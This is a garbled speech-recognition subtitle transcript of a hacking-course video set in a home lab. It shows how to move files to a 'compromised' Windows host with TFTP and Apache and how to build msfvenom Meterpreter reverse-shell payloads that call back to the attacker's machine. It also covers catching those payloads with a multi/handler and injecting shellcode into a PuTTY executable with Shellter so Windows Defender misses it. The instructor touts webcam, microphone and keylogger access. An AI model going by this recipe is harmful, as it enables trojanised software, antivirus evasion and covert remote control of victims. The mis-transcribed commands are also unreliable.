1
00:00:00,150 --> 00:00:06,630
OK, so before we can get into actually, you know, creating custom malware and explaining this one

2
00:00:06,630 --> 00:00:10,430
to CentOS, we have to talk about how to transfer our files over there in the first place.

3
00:00:10,710 --> 00:00:15,940
You know, if we want to be able to execute our custom, our executables, we have to be able to transfer

4
00:00:15,940 --> 00:00:17,410
it to the target system, of course.

5
00:00:17,790 --> 00:00:24,030
So thankfully, we can do this with pre install software on the target and also some this on colonics.

6
00:00:24,270 --> 00:00:29,280
Another thing that we're going to download as well, but some methods of transfer, you know, include

7
00:00:29,430 --> 00:00:32,370
FTP, SCDP and CFT.

8
00:00:32,370 --> 00:00:36,650
So we're going to focus on TFTP and I'm going to show you how to do that.

9
00:00:36,660 --> 00:00:38,730
You can take your pick on which one you want to do.

10
00:00:39,000 --> 00:00:44,580
OK, so over an hour, cowardliness machine first and then we're going to want to do is a pseudo NBT

11
00:00:44,580 --> 00:00:49,890
install and the follow that we're going to install is a TFTP.

12
00:00:50,160 --> 00:00:57,120
Now, this is going to be the TFTP server and it says I already have it installed.

13
00:00:57,690 --> 00:01:01,400
So you get the situates password.

14
00:01:01,620 --> 00:01:04,220
So it's going to say that I have the latest version installed.

15
00:01:04,800 --> 00:01:06,780
Also, I don't think that my things on the Internet either.

16
00:01:07,170 --> 00:01:11,010
So you're going to want to go ahead and install that and then we need to make a directory that we're

17
00:01:11,010 --> 00:01:11,820
going to use for it.

18
00:01:11,840 --> 00:01:16,870
So we used to ask Diaa TFT.

19
00:01:17,190 --> 00:01:23,820
So this is going to do with make a directory in the root directory called FTP so you can just go ahead

20
00:01:23,820 --> 00:01:25,420
and do that already have this created.

21
00:01:25,450 --> 00:01:26,430
So I'm not going to do that.

22
00:01:26,640 --> 00:01:28,350
I don't want to be in there.

23
00:01:28,980 --> 00:01:31,680
So then what we need to do one more thing.

24
00:01:31,890 --> 00:01:40,450
I'm going to see the pseudo S.H. own and then we're going to put nobody Colon's CFT here.

25
00:01:41,100 --> 00:01:43,410
This is just going to change the permissions of that.

26
00:01:43,410 --> 00:01:48,150
For that, we create it and just make nobody the owner is going to allow us to do the things that we

27
00:01:48,150 --> 00:01:50,280
need to do with this folder.

28
00:01:50,610 --> 00:01:57,390
So after you do that, we can start up the the damit, the service that we just saw.

29
00:01:57,420 --> 00:02:04,920
So so the command for that is a TFT, PD and then space test as daming.

30
00:02:05,130 --> 00:02:09,390
Now, when you see when you see the word Dayman, that just means that the service is going to be running

31
00:02:09,600 --> 00:02:13,290
in the background and it's not going to be like outputting stuff once at a terminal.

32
00:02:14,490 --> 00:02:20,670
So then you have a space port and then we're going to put Sixty-nine at this point that we're going

33
00:02:20,670 --> 00:02:22,370
to want to use them.

34
00:02:22,380 --> 00:02:28,050
We're going to put right here the directory that we're going to use as the home directory for Tsipi.

35
00:02:28,050 --> 00:02:35,600
So this is going to be our Sebastiao FTP folder and then we may need to run as a pseudo I'm going to

36
00:02:35,600 --> 00:02:36,170
do it anyway.

37
00:02:36,570 --> 00:02:40,020
So and then bam, now we have the running.

38
00:02:40,050 --> 00:02:43,800
So now we can go over to a compromise host.

39
00:02:44,070 --> 00:02:47,700
We can just our desktop over the time.

40
00:02:48,120 --> 00:02:50,220
Let's do our desktop.

41
00:02:52,690 --> 00:03:01,270
And then the sea went on to it, one six, eight, five, six to one, and so make things easier every

42
00:03:01,270 --> 00:03:04,780
time you do Dashti and declared the domain.

43
00:03:04,790 --> 00:03:12,820
So we know the domain name is Ethical Hacking Lab and then dash you you put the user so we know the

44
00:03:12,820 --> 00:03:21,560
uses poor victim and then we just hit enter and then it should connect us over and just give it a second

45
00:03:21,570 --> 00:03:22,230
and we get to go.

46
00:03:22,480 --> 00:03:27,670
OK, so what we can do, the first thing we want to do, like I said, is open up a command prompt.

47
00:03:27,880 --> 00:03:32,320
So just type in the search for our ACMD and then now we can try TPE.

48
00:03:32,530 --> 00:03:35,380
So Windows has it naturally installed.

49
00:03:35,470 --> 00:03:44,530
So we're going to do TFTP and then we're going to put Dash I and then we're going to put the address

50
00:03:44,530 --> 00:03:49,300
of our Kailin Xbox one zero one six eight five six one two seven.

51
00:03:49,870 --> 00:03:53,680
And then we'll get to it and then we're going to put the filename.

52
00:03:53,710 --> 00:04:03,040
So right now I have a in this last TFTP folder, I have a file called Test File Dot S.A.C..

53
00:04:03,940 --> 00:04:10,570
So we're going to go ahead and get that already copied over is let me delete that and now let's do it

54
00:04:10,570 --> 00:04:10,960
again.

55
00:04:12,780 --> 00:04:18,900
And so now Chassidic successful is now, as we can see, this file is back here and if we open it up,

56
00:04:19,440 --> 00:04:27,030
hey, this is a test text file so you can try to put any file over into that directory, that TPE directory

57
00:04:27,030 --> 00:04:30,430
and then copy it over, then you should be able to copy it to the hopes.

58
00:04:30,870 --> 00:04:37,890
OK, so remember how we started the Apache service before we're putting up the spoof website.

59
00:04:38,160 --> 00:04:43,470
So we're going to kind of use that as well and we can use that for file transfer and actually access

60
00:04:43,470 --> 00:04:46,890
the files that we put up here from our compromise post.

61
00:04:47,130 --> 00:04:50,790
So what we can do is actually just start up the service again.

62
00:04:50,970 --> 00:04:56,290
So pseudo service Apache to start.

63
00:04:57,270 --> 00:05:05,190
And then once that started out, remember, the home directory is the VA first w w w e html folders.

64
00:05:05,190 --> 00:05:07,460
So what we can do is actually copy stuff over there.

65
00:05:07,470 --> 00:05:10,340
So there's a folder here.

66
00:05:10,350 --> 00:05:17,610
So this is a pseudo there's a folder Oncolytics that has a bunch of windows, binary soldiers of the

67
00:05:17,610 --> 00:05:18,560
basic one over here.

68
00:05:19,260 --> 00:05:20,430
So we're going to Sepi.

69
00:05:20,640 --> 00:05:32,100
So she was our share such windows resources, such binaries, and then we have a wide variety that we

70
00:05:32,100 --> 00:05:33,390
can provide here.

71
00:05:33,600 --> 00:05:36,850
We see where Incat that we can put over there.

72
00:05:36,870 --> 00:05:38,940
So based on that Khaddafi, we wanted to use it.

73
00:05:38,940 --> 00:05:42,380
Maybe we can put like a reverse, like a pine shell over there.

74
00:05:42,390 --> 00:05:44,180
So we always connect over to it.

75
00:05:44,670 --> 00:05:52,400
We're going to do who am I that you see, we're going to copy that over to our T ftp.

76
00:05:52,650 --> 00:06:04,080
We're going to copy over to our slides w w or Vassos w w e-mail folder when you copy it over there so

77
00:06:04,410 --> 00:06:07,560
we can go to a compromise holes and see if we can access file.

78
00:06:07,780 --> 00:06:09,520
OK, so we're back on a compromise.

79
00:06:10,020 --> 00:06:14,770
So let's open up a browser and what we're going to do is we're going to type in Asadi kind of there

80
00:06:14,770 --> 00:06:19,070
right there on offer when we did the spoof, because remember, we can't we technically, you know,

81
00:06:19,080 --> 00:06:20,160
capture the cards.

82
00:06:21,060 --> 00:06:23,520
That's the address of my colleague's machine.

83
00:06:23,530 --> 00:06:29,950
So we're going to put the slides and then we're going to type in the whoever I see and see what happens.

84
00:06:30,150 --> 00:06:35,400
So now I was asking this, hey, do we want to run it savings so we could just save it?

85
00:06:36,000 --> 00:06:40,580
And then now we have that folder, open folder just to verify.

86
00:06:40,590 --> 00:06:44,060
Now we have this file locally on the system.

87
00:06:44,070 --> 00:06:49,230
So now we know two methods of actually file transferring to our compromise.

88
00:06:49,480 --> 00:06:52,270
So now we can go ahead and create custom malware.

89
00:06:52,770 --> 00:07:00,150
OK, so before we do this, I'm going to show you guys just like the basic way of creating malware and

90
00:07:00,810 --> 00:07:02,830
we're then we're going to do it a different way.

91
00:07:02,850 --> 00:07:06,600
So first, what are you going to need to do is actually disable those Defendor?

92
00:07:06,810 --> 00:07:08,220
Because it will block it.

93
00:07:08,490 --> 00:07:14,580
But we're going to go over how to how to get past it later on so you can just type in Windows Defender

94
00:07:14,580 --> 00:07:19,740
and you can probably just click on virus protection and let this load up.

95
00:07:20,040 --> 00:07:31,170
And what we're going to do is actually see the scroll down for and theft protection Manege settings

96
00:07:31,170 --> 00:07:34,200
and let's turn off real time protection.

97
00:07:34,980 --> 00:07:40,620
And we technically know that this is for demo use, of course.

98
00:07:40,840 --> 00:07:44,540
So I was going to ask for an administrative account to actually do this.

99
00:07:44,540 --> 00:07:47,540
So I'm going to give it a second to load up and we go.

100
00:07:48,090 --> 00:07:53,250
So, Administrator, because, you know, we technically made the account so we know the password.

101
00:07:54,600 --> 00:07:57,630
And so now we had the real time protection officer.

102
00:07:57,630 --> 00:07:58,530
Good to go.

103
00:07:58,560 --> 00:07:59,940
All this other stuff already off.

104
00:08:00,060 --> 00:08:03,120
So now we have real time protection off.

105
00:08:03,780 --> 00:08:08,960
So what we can do is actually freely copy, you know, malicious files over.

106
00:08:08,970 --> 00:08:15,330
So let's go back to our current Linux machine and let's try to create our first malware.

107
00:08:15,630 --> 00:08:21,850
OK, so in order to create our custom malware, there's a software called Venom.

108
00:08:22,320 --> 00:08:26,580
So that's the command that we're going to type in and we're going to give it a bunch of arguments.

109
00:08:26,940 --> 00:08:31,350
The venom is just how you can actually create your custom malware, our custom payloads.

110
00:08:31,620 --> 00:08:33,690
So let's start to give us some arguments.

111
00:08:33,690 --> 00:08:38,370
So the first one is going to be DP and then this is going to designate the payload.

112
00:08:38,370 --> 00:08:40,950
So we're, you know, go for windows.

113
00:08:41,160 --> 00:08:43,470
So Windows slash interpreter.

114
00:08:43,650 --> 00:08:45,550
So this means that we want to open them.

115
00:08:45,580 --> 00:08:53,610
Interpreter Show pretty much an interpreter is like a program that allows us to remotely execute commands

116
00:08:53,610 --> 00:08:56,550
it like do all kinds of amazing stuff on the house.

117
00:08:57,030 --> 00:08:59,820
So we definitely want to try to get my interpreter shows.

118
00:09:00,480 --> 00:09:05,280
And when I say Shell, I just mean like a remote session, like a remote session or something like that.

119
00:09:06,300 --> 00:09:10,040
So then we're going to do a reverse underscore https.

120
00:09:10,230 --> 00:09:12,290
So all that part means is that it's.

121
00:09:12,510 --> 00:09:15,090
Connect back to our Ali leaving's machine over.

122
00:09:15,660 --> 00:09:17,660
Yes, give us a little bit of encryption.

123
00:09:17,790 --> 00:09:23,040
So the next day we're going to do our host and then we're going to put the callisthenics machine IP

124
00:09:24,900 --> 00:09:27,120
service and then we're going to port.

125
00:09:27,840 --> 00:09:32,580
So this the port that is going to connect over this is the port that we're going to be listening for

126
00:09:32,940 --> 00:09:34,260
the connection to come back to.

127
00:09:34,320 --> 00:09:35,550
So four four four four.

128
00:09:35,580 --> 00:09:40,620
Let's just do that for now and then dash e we're going to choose an encoder and this is actually going

129
00:09:40,620 --> 00:09:43,800
to encode our payload.

130
00:09:43,810 --> 00:09:45,960
So it's not exactly detectable.

131
00:09:45,960 --> 00:09:48,840
It still will be in the state that we're doing right now.

132
00:09:49,260 --> 00:09:53,150
But there are ways that I'm going to show you the capacity.

133
00:09:53,820 --> 00:09:55,670
And along with that, we do dash.

134
00:09:55,680 --> 00:09:57,670
I would like something like seven.

135
00:09:57,720 --> 00:10:03,090
So it's going to run it through the encoder like seven different times to kind of mix it up a little

136
00:10:03,090 --> 00:10:07,820
bit, jumbled it up, and then dash f we're going to designate the file type.

137
00:10:08,010 --> 00:10:10,410
So we want to make a file.

138
00:10:10,470 --> 00:10:15,420
OK, and then we're going to get it assigned and then this is going to be the name of the output file.

139
00:10:15,660 --> 00:10:22,980
So let's just do exploit easy and then we can just enter and it's going to go through and create the

140
00:10:22,980 --> 00:10:26,150
payload usually takes about one or two minutes.

141
00:10:26,160 --> 00:10:28,950
So just give it a little bit of time will come right back.

142
00:10:29,610 --> 00:10:38,160
OK, so our payload file finished being created so we could do it less and then we could check it out.

143
00:10:38,170 --> 00:10:43,480
So we see that the file is our exploit e e right here.

144
00:10:43,890 --> 00:10:47,060
So what we can do is actually copy this over.

145
00:10:47,070 --> 00:10:50,910
So I prefer to keep it's pretty quick straight to the point.

146
00:10:50,910 --> 00:10:59,850
So Suto Kafi exploit e I'm going to put this in the last FCP folder copied over here.

147
00:11:00,180 --> 00:11:02,460
I'm going to go back to my compromise host.

148
00:11:04,400 --> 00:11:13,950
And I'm going to do the same command, but I'm going to put exploit, you see, so let's see what happens.

149
00:11:13,970 --> 00:11:15,530
So Transavia successful.

150
00:11:15,920 --> 00:11:19,580
So we see that the file is right here.

151
00:11:19,610 --> 00:11:27,080
So before we run it, we have to go ahead and actually go into medicine and actually get ready to catch

152
00:11:27,080 --> 00:11:29,670
this interpretor show that's going to be coming back to us.

153
00:11:30,230 --> 00:11:33,710
So what is reverse its connection?

154
00:11:33,920 --> 00:11:41,720
So we're going to go back to our colleague Gene Taylor himself, console and hit enter and then give

155
00:11:41,720 --> 00:11:44,940
this a minute to load, and it takes a minute or two as well.

156
00:11:44,960 --> 00:11:46,630
So we're going to come back once it's loaded.

157
00:11:47,270 --> 00:11:49,610
OK, so we have a massive console up.

158
00:11:49,620 --> 00:11:58,150
So the first time we're going to do is want to do use, exploit, slash, multi slash handler.

159
00:11:58,370 --> 00:12:04,400
And this is just what you can use actually pretty much catch interpretor sessions that you're trying

160
00:12:04,400 --> 00:12:06,600
to set up typically so to enter.

161
00:12:06,980 --> 00:12:08,180
So now we're using that.

162
00:12:08,390 --> 00:12:15,620
So we're going to want to set the payload to the same payload as what's in our executable payload windows.

163
00:12:16,010 --> 00:12:16,700
Interpreter,

164
00:12:18,840 --> 00:12:28,130
interpreter, slash reverse underscore a few tips so we set our payload.

165
00:12:28,280 --> 00:12:35,360
So now there's another command that we're going to want to do is set auto run scripts and then we're

166
00:12:35,360 --> 00:12:37,750
going to post windows.

167
00:12:37,880 --> 00:12:40,520
So I manage my migrate.

168
00:12:40,520 --> 00:12:46,010
This is going to make sure that, you know, our session migrates appropriately to the right process

169
00:12:46,010 --> 00:12:49,670
idea that, you know, things really don't get dropped or runs into issues.

170
00:12:49,790 --> 00:12:51,700
I want to make sure we have our connection solid.

171
00:12:51,890 --> 00:12:53,720
So now we just have to set our house.

172
00:12:53,720 --> 00:12:57,290
So you got two options if you want to see what the different things you the set are.

173
00:12:57,770 --> 00:13:11,150
So I'm going to set our hosts one or two down one six eight five, six, seven set said Port four four

174
00:13:11,150 --> 00:13:11,890
four four.

175
00:13:12,680 --> 00:13:16,580
And I could just do another option just to check and make sure everything's right.

176
00:13:16,800 --> 00:13:18,310
The payload looks right.

177
00:13:18,320 --> 00:13:20,190
My dress looks right.

178
00:13:20,540 --> 00:13:22,100
So now we're ready to launch.

179
00:13:22,140 --> 00:13:24,330
So let's go ahead and type exploit, exploit.

180
00:13:24,360 --> 00:13:24,960
That's cool.

181
00:13:25,370 --> 00:13:32,610
So what we're going to do is just wait right here for a second and now it's the start of a reverse handler.

182
00:13:33,320 --> 00:13:38,890
So now our machine is listening for connection over four four four four.

183
00:13:39,170 --> 00:13:44,420
So let's go back over to our Windows machine and let's try to launch this next week.

184
00:13:44,450 --> 00:13:49,820
So what I notice is that when I run it one time, it didn't work, but when I double click it twice,

185
00:13:50,030 --> 00:13:52,660
it typically connects over something that connects to first time.

186
00:13:52,970 --> 00:13:56,620
But if it doesn't work the first time that you double click it, just go ahead and go back.

187
00:13:56,650 --> 00:13:59,000
So you double click and see what happens.

188
00:13:59,900 --> 00:14:01,250
So it didn't do it.

189
00:14:01,700 --> 00:14:06,290
So let's just give it a second and just see if it worked.

190
00:14:06,440 --> 00:14:08,820
So just give it a minute and might take a second to connect.

191
00:14:09,510 --> 00:14:12,470
OK, so now we have a return of the shell, as you can see.

192
00:14:13,220 --> 00:14:19,030
So you type in help and there's a lot of different commands that we can do, you know, over on here.

193
00:14:19,040 --> 00:14:22,730
So as you can see, you can record stuff in the microphone.

194
00:14:23,420 --> 00:14:30,860
You can check out the web cam, all kinds of stuff that you could enumerate, all kinds of information

195
00:14:31,580 --> 00:14:37,820
we can, you know, don't what stuff the typing like, you know, with like a key, a key logger, all

196
00:14:37,820 --> 00:14:38,730
kinds of stuff.

197
00:14:38,990 --> 00:14:42,670
So interpretor is definitely helpful to you.

198
00:14:42,680 --> 00:14:44,910
Definitely want to aim to get an interpreter.

199
00:14:44,910 --> 00:14:49,130
So when you're, you know, exploiting these systems.

200
00:14:49,490 --> 00:14:56,180
OK, so now we know how to put malware onto the system, but what about if Windows Defender or something

201
00:14:56,180 --> 00:14:56,750
is on?

202
00:14:57,200 --> 00:14:58,790
So it's going to detect stuff.

203
00:14:58,790 --> 00:15:02,930
So like, for example, I term Windows defender, real time protection back on.

204
00:15:03,230 --> 00:15:06,920
So if I actually go, let me see.

205
00:15:06,920 --> 00:15:08,450
Let me delete this file.

206
00:15:09,670 --> 00:15:15,370
I was actually not going to do it because Windows Defender probably already had already found it, so

207
00:15:15,370 --> 00:15:20,810
we can't copy the file over anymore if we wanted to if we try to do the same exact thing.

208
00:15:21,070 --> 00:15:22,000
They can't write.

209
00:15:22,270 --> 00:15:25,750
And then a problem with, you know, virus protection right here.

210
00:15:26,080 --> 00:15:30,220
So what we're gonna do is actually to bypass the antivirus system.

211
00:15:31,120 --> 00:15:37,800
So the way that we can do that, just a series of steps and a software called shelter.

212
00:15:37,810 --> 00:15:40,210
So let's go back to our machine and check that out.

213
00:15:40,600 --> 00:15:46,960
OK, so we're going to create a new payload and a victim again, and then we're going to dash P and

214
00:15:46,960 --> 00:15:54,130
then we'll Windows interpretor and then we're going to do this time we going to reverse underscore TCP

215
00:15:54,130 --> 00:16:03,850
connection and then say things before put our host one on to the one six eight, six, seven, and then

216
00:16:03,850 --> 00:16:08,560
I'm going to do outport this time as Port 80.

217
00:16:08,830 --> 00:16:10,210
You know, I'm not too suspicious.

218
00:16:10,240 --> 00:16:10,510
All right.

219
00:16:10,780 --> 00:16:18,640
And then we'll be coded again with the same exact Encoder Shikata gunnii.

220
00:16:19,630 --> 00:16:20,440
There we go.

221
00:16:21,370 --> 00:16:25,110
And then we're going to iterate through seven times with the encoder.

222
00:16:25,510 --> 00:16:31,810
But this time we did a dash f we're going to do we're going to put it in a raw format.

223
00:16:31,990 --> 00:16:33,900
So it's not going to exactly be easy.

224
00:16:34,210 --> 00:16:39,820
And then we're going to put that into a file that we're going to call Meqdad been.

225
00:16:40,360 --> 00:16:45,220
So this isn't exactly on an executable file.

226
00:16:45,560 --> 00:16:53,470
We can still use this and inject it into an actual file and have that run when we put it on to the host

227
00:16:55,060 --> 00:17:00,490
so we can go ahead and do that, give it a second and let that finish up, OK?

228
00:17:00,640 --> 00:17:06,430
So our new payload is complete, so we just do less and actually verify that is there.

229
00:17:06,700 --> 00:17:10,870
So if you look for we'll see our Medoc been file right there.

230
00:17:11,050 --> 00:17:18,080
OK, so the next thing we're going to want to do is actually go and download.

231
00:17:18,550 --> 00:17:20,930
So as you know, PURRY is like a tool.

232
00:17:21,340 --> 00:17:27,160
So what we can do, I need to get on connection right here and then get on to the Web.

233
00:17:27,580 --> 00:17:32,470
I really have to do is just Google like Pudi download or something.

234
00:17:32,480 --> 00:17:33,880
So that's all I'm going to do really quick.

235
00:17:34,690 --> 00:17:35,380
Let me get in.

236
00:17:35,380 --> 00:17:36,490
There they go.

237
00:17:36,490 --> 00:17:39,630
Party download.

238
00:17:39,700 --> 00:17:40,330
There you go.

239
00:17:41,380 --> 00:17:44,290
And then it's like the first link that pops up.

240
00:17:45,220 --> 00:17:52,680
So you go to download and what we're going to do is actually download the X file, not the M as I file.

241
00:17:52,930 --> 00:17:59,050
So if you just scroll down, you'll see that there is that data to be 64 bit.

242
00:17:59,320 --> 00:18:01,210
You can grab either one.

243
00:18:01,210 --> 00:18:08,170
I, I have found success with the 32 bit and actually that's what we need to use this other software

244
00:18:08,170 --> 00:18:12,970
that you can use and inject, you know, payloads into executables.

245
00:18:13,090 --> 00:18:17,540
But the one that we're using is actually going to use a thirty two, but it can only take 30 to be a

246
00:18:17,560 --> 00:18:17,880
file.

247
00:18:17,900 --> 00:18:19,300
So we're going to download this.

248
00:18:20,930 --> 00:18:25,250
So you can download it and then it's going to be in your downloads folder.

249
00:18:26,210 --> 00:18:27,820
I already have it.

250
00:18:27,980 --> 00:18:38,060
So I have a folder to see payloads and then I have this file right here that Putti 30 to see.

251
00:18:38,900 --> 00:18:45,830
So what I'm going to do, I'm going to back out really quick.

252
00:18:46,340 --> 00:18:52,400
I'm going to keep my met, been into this payloaders folder.

253
00:18:54,040 --> 00:18:55,610
See, there you go.

254
00:18:56,020 --> 00:19:06,500
So now let's go back to payloads and then I have my party father and copy over here to is a copy see

255
00:19:06,670 --> 00:19:13,930
squiggle downloads and then should be putty.

256
00:19:13,960 --> 00:19:15,610
I think I've changed the punditry to.

257
00:19:16,900 --> 00:19:17,290
Yeah.

258
00:19:17,300 --> 00:19:21,180
So this is the default file on the copy over to here.

259
00:19:21,190 --> 00:19:23,210
So party three two.

260
00:19:23,320 --> 00:19:23,930
I see.

261
00:19:23,980 --> 00:19:29,500
I'm going to override the fathers in this directory that I'm in and through Asuda to do that.

262
00:19:30,730 --> 00:19:31,490
There we go.

263
00:19:31,510 --> 00:19:36,240
So now we have this stuff that we need in this folder.

264
00:19:36,760 --> 00:19:41,060
So the next day we're going to do is actually install this application called shelter.

265
00:19:41,350 --> 00:19:45,510
So you're going to be able to install shelter.

266
00:19:45,850 --> 00:19:50,980
And when you try to do that, it's probably going to tell you that you have to do some other a couple

267
00:19:50,980 --> 00:19:51,730
of the commands.

268
00:19:52,810 --> 00:19:56,950
So what you're going to need to do is Suto deep.

269
00:19:57,010 --> 00:20:02,440
Kaiji downstairs and there's architecture.

270
00:20:03,220 --> 00:20:07,670
And then I three, eight, six, two.

271
00:20:07,690 --> 00:20:17,320
And Symbol's is just to give another batch commands a pseudo ABC does get an update and then you to

272
00:20:17,320 --> 00:20:19,890
do another batch command.

273
00:20:20,110 --> 00:20:30,940
So and and pseudo ABC Dasch you install one three two and one three two allows us to compile 30 different

274
00:20:30,940 --> 00:20:34,540
Windows applications, you know, on our Linux machine.

275
00:20:34,700 --> 00:20:42,360
OK, so once you do that, you then start try to install shelter again in a shelter with two L's.

276
00:20:43,360 --> 00:20:50,310
So once that's done and it's all downloaded, we can erase this and we're going to run shelter.

277
00:20:50,710 --> 00:20:56,590
So let's go ahead and run Suto shelter Souto.

278
00:20:58,870 --> 00:20:59,500
So the.

279
00:21:00,700 --> 00:21:06,250
And then it's going to take a second and it's going to pop up with this window, kind of neat little

280
00:21:06,250 --> 00:21:09,580
graphic shelter, so choose operation mode.

281
00:21:09,940 --> 00:21:14,260
So what we're going to do, want to do a Oromos and we're not to worry too much.

282
00:21:14,740 --> 00:21:23,190
So now the P target is going to be the fire that we're going to inject our payload into, which is that

283
00:21:23,200 --> 00:21:24,300
might have been found.

284
00:21:24,550 --> 00:21:34,480
So the farther we're going to inject that form into is the to take some of the home slash Calli slash

285
00:21:34,630 --> 00:21:41,250
payloads, slash Pudi 30 to EXI.

286
00:21:41,290 --> 00:21:41,720
OK.

287
00:21:43,360 --> 00:21:50,230
So now was going to see this next step takes like 30 to 60 seconds, so just give them some time to

288
00:21:50,290 --> 00:21:51,000
come right back.

289
00:21:52,100 --> 00:21:58,880
OK, so our 60 seconds have passed, so now I was going to ask us if we want to enable stealth mode

290
00:21:59,390 --> 00:22:05,150
where this is going to do as kind of like stealthily put it in there so that the file tax will still

291
00:22:05,150 --> 00:22:08,960
execute as needed as is originally intended to.

292
00:22:09,110 --> 00:22:10,280
You could do that if you want.

293
00:22:10,280 --> 00:22:14,760
I found less success with that and actually got detected when I would do that.

294
00:22:14,770 --> 00:22:18,600
So we can do no for a naval stealth mode.

295
00:22:19,250 --> 00:22:21,080
So now is as good as our payload.

296
00:22:21,130 --> 00:22:23,030
So you know, what the payload is, is an interpreter.

297
00:22:23,040 --> 00:22:28,010
So in terms of the payload, so we can we want to do a custom one.

298
00:22:28,280 --> 00:22:31,810
So we're going to do a capital C and ask for the payload.

299
00:22:31,820 --> 00:22:35,240
So we're going to give it the full directory forces us home.

300
00:22:35,510 --> 00:22:43,370
So the scaley sized payloads slash yet been found.

301
00:22:43,490 --> 00:22:46,390
And then it's going to ask if it's a reflective downloader.

302
00:22:46,400 --> 00:22:49,100
We're just going to say no to that because it is not.

303
00:22:49,460 --> 00:22:54,470
And then now it's going to go through and inject it in there and it's going to give you a confirmation

304
00:22:54,860 --> 00:22:56,240
and then you just enter.

305
00:22:56,450 --> 00:22:59,510
So there we go, injection verified enter.

306
00:22:59,810 --> 00:23:08,630
And now we know that our priority to the file is now inject it with our panel.

307
00:23:09,200 --> 00:23:14,630
So let's copy this over to our TV folder.

308
00:23:14,630 --> 00:23:19,070
So pseudo S.P. Putti three to see.

309
00:23:23,060 --> 00:23:27,150
So today, the TFTP Bam!

310
00:23:27,650 --> 00:23:29,520
So now we know that it's over there.

311
00:23:29,540 --> 00:23:35,630
So now the moment of truth is going to are our compromise hosts.

312
00:23:35,640 --> 00:23:37,260
So let's try this again.

313
00:23:37,470 --> 00:23:40,720
Oh, I connected to the Internet, so it was disconnected me from that.

314
00:23:40,730 --> 00:23:43,430
So give me a second and I'll get right back on here, OK?

315
00:23:43,440 --> 00:23:46,940
So I'm back connected to my host, so I'm going to try to it again.

316
00:23:47,180 --> 00:23:52,190
But this time we're going to do Putti 30 to date.

317
00:23:52,910 --> 00:23:54,320
Now let's see what happens.

318
00:23:55,430 --> 00:23:56,680
Oh, it's already here.

319
00:23:56,690 --> 00:23:58,360
So actually I need this files.

320
00:23:58,360 --> 00:23:59,170
So give me a second.

321
00:23:59,300 --> 00:24:01,910
I need to delete this one is a friend of mine.

322
00:24:01,910 --> 00:24:02,670
Give me trouble.

323
00:24:02,670 --> 00:24:04,160
Let me try to delete this really quick.

324
00:24:06,670 --> 00:24:07,620
There we go, cool.

325
00:24:07,910 --> 00:24:10,500
OK, so that's delete it, so sorry was a.

326
00:24:11,790 --> 00:24:20,030
You have to be it to accept transfers successful, so before we try to transfer to exploit that easy

327
00:24:20,070 --> 00:24:27,480
fall, it could have righted because what was the film was detecting it as malware.

328
00:24:27,690 --> 00:24:33,540
But now after we went through shelter and injected into an innocent file.

329
00:24:34,540 --> 00:24:43,780
Now it's undetectable by antibodies, so we can confirm that is over here, Pudi, 32, so we know that

330
00:24:43,780 --> 00:24:44,570
that is there.

331
00:24:45,430 --> 00:24:50,530
So what we can do now, we need to go back before before we execute it.

332
00:24:51,040 --> 00:24:53,390
We need to go launch a massive consolo again.

333
00:24:53,410 --> 00:24:54,540
So already have it up here.

334
00:24:54,760 --> 00:24:57,730
So the only thing we're going to do here is actually change the payload.

335
00:24:57,730 --> 00:25:02,430
So it's set and actually change the payload window.

336
00:25:02,700 --> 00:25:10,600
Slash interpreter slash reverse underscore t, c, p.

337
00:25:10,810 --> 00:25:11,360
There we go.

338
00:25:12,100 --> 00:25:15,720
So now we're also going to sell for 80.

339
00:25:17,270 --> 00:25:24,610
We're going to exploit and it's going to we have to do this as actually a song about the I actually

340
00:25:24,610 --> 00:25:26,440
know because Apache is running.

341
00:25:26,440 --> 00:25:28,890
So that's actually close off Apache right now.

342
00:25:29,350 --> 00:25:35,620
So pseudo service Apache to stop.

343
00:25:37,370 --> 00:25:39,420
So now property should be free.

344
00:25:39,440 --> 00:25:41,360
So now we should be able to exploit.

345
00:25:42,900 --> 00:25:48,650
Permission not so you need to be zero, so I'm going to exit out, of course, Escudo.

346
00:25:48,690 --> 00:25:49,310
I'll be right back.

347
00:25:50,030 --> 00:25:52,760
OK, so I got everything back and running as a pseudo.

348
00:25:52,770 --> 00:25:54,720
So those are our options.

349
00:25:54,720 --> 00:25:56,250
We have a colonics machine there.

350
00:25:56,470 --> 00:25:58,320
We're going to be listening over 80.

351
00:25:58,530 --> 00:26:00,300
So let's go ahead and type in run.

352
00:26:00,510 --> 00:26:02,730
And now we've got the same as before.

353
00:26:03,030 --> 00:26:05,690
Start of reverse Tsipi handle import 80.

354
00:26:05,850 --> 00:26:11,100
So now our machine is listening for a connection, a specific connection over for Haiti.

355
00:26:11,520 --> 00:26:13,770
So let's go right to our house.

356
00:26:14,100 --> 00:26:16,470
And I just had to execute this fall as it happens.

357
00:26:17,050 --> 00:26:22,800
So once again you might have executed a couple of times for it to actually, you know, make that connection

358
00:26:22,800 --> 00:26:23,090
back.

359
00:26:23,110 --> 00:26:23,910
But this happens.

360
00:26:24,570 --> 00:26:27,180
What I mean by the boom might take a couple of tries.

361
00:26:27,180 --> 00:26:29,280
So go ahead and try it again and give it a second.

362
00:26:29,520 --> 00:26:32,070
You see the little spinning, the circle right there spinning.

363
00:26:32,070 --> 00:26:33,090
So something's happening.

364
00:26:33,390 --> 00:26:35,250
So it's trying to reach out and make a connection.

365
00:26:35,250 --> 00:26:38,280
So let's try to open it again and see what happens.

366
00:26:38,900 --> 00:26:45,420
OK, so we gave it a second and now we're starting to actually capture that connection back to our machine.

367
00:26:45,570 --> 00:26:48,660
Just do it on migration successfully and we're good to go.

368
00:26:48,660 --> 00:26:54,900
So now we have an to show again, and we did that by bypassing antivirus.

369
00:26:55,260 --> 00:26:56,220
That is amazing.

370
00:26:56,220 --> 00:27:02,790
So now you have the power to bypass antivirus, whatever that you make you set to make sure that you

371
00:27:02,790 --> 00:27:03,830
do follow these steps.

372
00:27:03,850 --> 00:27:04,630
You'd be good to go.

373
00:27:04,890 --> 00:27:12,270
So now you, my interpreter, and do all kinds of stuff like install a key logger for privilege, escalation

374
00:27:12,270 --> 00:27:14,250
stuff, more system integration.

375
00:27:14,490 --> 00:27:20,520
Once again, you can just type in help and you can see all kinds of stuff and you can try different

376
00:27:20,520 --> 00:27:22,890
commands and just play around it.